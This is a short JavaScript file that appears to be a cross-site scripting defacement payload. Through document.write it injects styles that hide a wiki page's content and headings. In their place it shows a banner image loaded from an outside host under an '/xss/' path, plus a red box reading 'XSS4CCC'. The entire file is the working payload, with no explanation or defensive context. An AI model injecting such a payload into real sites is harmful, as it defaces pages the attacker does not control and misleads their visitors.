document.write('<style type="text/css">');
document.write('#content{background: url(http://meingottundmeinewelt.de/xss/mgumw-845-194.jpg) no-repeat!important; width: 845px!important; height:194px!important;}');
document.write('#bodyContent, .firstHeading{display:none}');
document.write('#xss');
document.write('{');
document.write('margin-left: 500px;');
document.write('padding-top: 5px;');
document.write('width: 200px;');
document.write('height: 20px;');
document.write('background-color: #cc0000;');
document.write('color: #FDFD00;');
document.write('font-size: 1.5em;');
document.write('font-weight: bold;');
document.write('}');
document.write('</style>');
document.write('<div id="xss" align="center">');
document.write('XSS4CCC');
document.write('</div>');

